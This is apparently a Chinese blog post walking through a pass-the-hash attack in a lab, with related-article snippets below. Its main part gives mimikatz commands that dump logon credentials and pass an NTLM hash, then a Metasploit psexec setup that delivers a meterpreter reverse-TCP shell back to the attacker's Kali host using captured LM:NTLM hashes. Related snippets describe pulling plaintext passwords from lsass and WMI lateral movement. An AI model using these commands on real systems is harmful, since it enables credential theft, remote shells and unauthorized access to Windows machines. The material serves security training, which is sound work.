哈希传递(PTH)攻击利用

最新推荐文章于 2023-07-17 14:36:43 发布
最新推荐文章于 2023-07-17 14:36:43 发布
阅读量834 收藏 3
点赞数
分类专栏: 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niqiu320/article/details/117453819
版权

哈希传递(PTH)攻击利用

环境:kali &win8

privilege::debug
sekurlsa::logonpasswords

win8中运行:
网上github先下载mimikatz_trunk,下载解压后在x64中打开小猕猴桃
在这里插入图片描述

sekurlsa::pth /user:administrator /domain:本机IP /ntlm:7365e3b22baeaebc0411873eedf84390

在这里插入图片描述
在这里插入图片描述
kali中按下方操作

msf > use  exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost kaliip
msf exploit(psexec) > set rhost win10ip
msf exploit(psexec) > set smbuser Administrator
msf exploit(psexec) > set smbpass 6d181cfaad0258eaaad3b435b51404ee: 9d482ae1705fd48c581e20a4123fb0dc   # 冒号前面为LM后面为NTLM
msf exploit(psexec) > exploit

运行结果如下:在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

香芋320
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali密码攻击之——哈希传递攻击
The__Apollo的博客
04-22 7119
passing the hash,中文一般翻译为hash传递攻击,在windows系统中,系统通常不会存储用户登录密码,而是存储密码的哈希值,在我们远程登录系统的时候,实际上向远程传递的就是密码的hash值。当攻击者获取了存储在计算机上的用户名和密码的hash值的时候,他虽然不知道密码值,但是仍然可以通过直接连接远程主机,通过传送密码的hash值来达到登录的目的。passing the hash套件
Kali linux 学习笔记(六十三)密码破解——中间人攻击(mitmf、ettercap、PTH) 2020.4.7
闵行小鱼塘
04-07 1881
本节学习中间人攻击,主要是mitmf、ettercap、PTH
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
Kali Linux渗透测试——密码破解
子曰小玖的博客
06-01 3788
当目标系统无任何已知漏洞时,可以考虑社会工程学或者获取目标系统的用户身份,通过合法账户登录绕过系统的安全防线。账户登录身份认证包括账号密码、passphrase、密保、手机、指纹、声纹、面部识别等,其中账号密码是安全级别较低的认证方式,基于互联网的身份认证仍以账号密码为主要形式。 密码破解的方法通常有基于社会工程学的人工猜测、基于字典的暴力破解以及基于中间人攻击的密码嗅探。 文章目录 一、字典 (一)Crunch (二)Cupp (三)Cewl (四)John the Rip..
内网中的简单横向移动
Amire0x的小乐园
11-30 1584
横向移动 WMI 简介 全程Windows管理规范,从03开始一直存在 由一系列工具组成,可以在本地或者远程管理计算机系统 Windows默认不会讲WMI的操作记录在日志中 利用 条件 WMI服务开启,135端口,默认开启 防火墙允许135,445等端口通信 测试方法 nmap -p 135 ip telnet ip 135 ...... 管理员权限,及本地管理员组 wmic 用powershell联动cs wmic /node:<目标 ip> /user:<用户或域
PTH攻击总结
systemino的博客
05-26 5097
搞过内网渗透的,你肯定听过pth攻击。这种攻击效果非常显著,微软也是因此在存储凭证方面做了很大的改变。但即使是不断的更新,发布补丁,pth攻击还是存在。今天我们就来一探究竟。 目录 ·pth攻击回顾 ·微软更新 ·hash和NTLM介绍 ·Pth攻击原理 ·Zeros取代LM hash ·实际中的配置 ·pth攻击 ·Mimikatz ·SMB pth攻击 · msf scanner/smb/smb_login · Empire lateral_moveme...
内网横向移动—PTH哈希&PTT票据&PTK密匙&Kerberos
最新发布
剁椒鱼头没剁椒的博客
07-17 933
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
pth(pass the hash)哈希传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 2416
pth(pass-the-hash)哈希传递攻击在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码域/工作组环境账号hash内网中存在和当前机器相同的密码(ps:微软打了KB22871997补丁后只有Administrator(SID 500)可以PTH成功,默认windows server 2012后都会存在补丁)
PtH(hash传递攻击)原理探秘
weixin_30500473的博客
08-10 3554
背景知识 Windows 横向渗透的两种方式 1、hash传递攻击,通过传递NTLM-Hash,登录机器,简称PtH; 2、ticket传递攻击,通过传递kerberos的ticket,登录机器,简称PtT; 以上两种都是常见的域内或者叫做内网渗透的横向移动的常见手段。 NTLM协议机制简述 在hash传递攻击中。传递的就是NTLMhash值,这里我们就要简述一下NTLM的过程。 NT...
哈希碰撞与生日攻击
02-21
在数字证书领域经常会用到哈希取摘要做签名,有没有可能对不同的信息取摘要的结果是相同的呢?有可能,所以有必要分析一下哈希碰撞的概率问题
PHP内核探索:哈希表碰撞攻击原理
12-19
最近哈希表碰撞攻击(Hashtable collisions as DOS attack)的话题不断被提起,各种语言纷纷中招。本文结合PHP内核源码,聊一聊这种攻击的原理及实现。  哈希表碰撞攻击的基本原理 哈希表是一种查找效率极高的数据...
哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
02-06
哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
未授权访问漏洞
niqiu320的博客
04-24 4431
web端未授权访问 未授权访问:未授权访问漏洞可以理解为需要安全配置或权限认证的地址,授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 B/S架构中 一般存在后台界面中,访问特定目录下的敏感文件,能直接跳过管理员登录,去访问后台管理内容。 C/S架构中 一般存在默认安装的一些客户端应用程序中,安装人员因缺少安全意识导致攻击利用。 web端未授权挖掘实例 查找技巧 1、在访问后台时会在一瞬间加载出后台界面, 这时可以尝试挖掘。 2、在后台地址url中后面输入
html静态页面
niqiu320的博客
05-06 3753
0x00 什么是网页? 网页是网站中的-“页”,通常是HTML格式的文件,它通过浏览器来阅读。 网页是构成网站的基本元素,它通常由图片、链接、文字、声音、视频等元素组成。通常我们看到的网页,常见以 .htm 或 .hmtl 后缀结尾的文件,因此将其俗称为HTML文件。 什么是HTML? HTML指的是超文本标记语言,它是用来描述网页的一种语言。 HTML不是一种编程语言,而是一种标记语言。 标记语言是一套标记标签。 所谓超文本,有2层含义: 1、它可以加入图片、声音、动画、多媒体等内容(超越了文本
DC 靶机
niqiu320的博客
05-12 3725
DC-1实战 大致流程(copy博客为lainwith的) 环境kali 1、首先ifconfig 得知ip为192.168.149.xxx/ 2、局域网探测arp-scan -l 得知靶机ip为192.168.149.147 3、扫描端口nmap -sV -p- 192.168.149.147,查看端口信息,得知80端口开放,浏览器访问80端口查看 4、目录遍历dirb http://192.168.149.147,无可用信息 5.、启动Metersploit来查看漏洞并利用漏洞msfconsole 6
解析漏洞
niqiu320的博客
04-23 3510
IIS解析漏洞 什么是解析漏洞? 解析漏洞主要是一些特殊文件被Apache、IIS、Nginx等Web容器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞。 解析漏洞分类: IIS解析漏洞 Nginx解析漏洞 Apache解析漏洞 IIS解析漏洞: 1、目录解析: 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。 2、文件解析 .asp;.jpg像这种畸形文件名在“;”后面的直接被忽略,也就是说当成.asp ...
python小测试
niqiu320的博客
05-14 3120
姓名: 作答时间: 1:请说明解释型语言和编译型语言之间的区别 2:面向过程编程/函数式编程/面向对象编程三者之间的异同点 3:请写出Python的选择结构与循环结构,注意语法格式 4:请简单描述8中基本的排序算法,并说明其优缺点。 插入排序/希尔排序/选择排序/冒泡排序/快速排序/堆排序/归并排序/基数排序 5:针对文件操作的方法,请写出6中,并写出C类1-255IP地址(参照PHP操作方法) r  只读,默认模式 w  只写,不可读,若文件不存在则创建,若存在,则删除内容,写入新内容 a
哪种对哈希算法的攻击已经成为现实
06-12
目前,针对哈希算法的攻击主要有以下几种: 1. 彩虹表攻击:彩虹表攻击是一种离线攻击方式,攻击者事先生成一张包含大量明文和哈希值对照表的数据库,然后通过对比哈希值和数据库中的数据,找到明文。虽然彩虹表攻击需要占用大量存储空间,但其速度很快,可以有效地破解较短的哈希值。 2. 生日攻击:生日攻击是一种针对哈希算法的碰撞攻击方式。攻击者通过构造两个不同的明文,使其哈希值相同,从而绕过哈希算法的安全性。生日攻击的原理是通过概率学的方法,利用生日悖论,通过枚举大量的随机数据,找到两个相同的哈希值。 3. 字典攻击:字典攻击是一种在线攻击方式,攻击者通过不断地尝试不同的明文进行哈希运算,直到找到与目标哈希值相同的明文。字典攻击需要耗费大量的时间和计算资源,但对于弱哈希算法来说,仍然是一种有效的攻击方式。 总的来说,彩虹表攻击和生日攻击已经成为现实,特别是在针对弱哈希算法的攻击中。因此,为了保证数据的安全性,应该使用更加安全的哈希算法,并采取其他安全措施,如加盐、迭代哈希等,来增加哈希算法的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值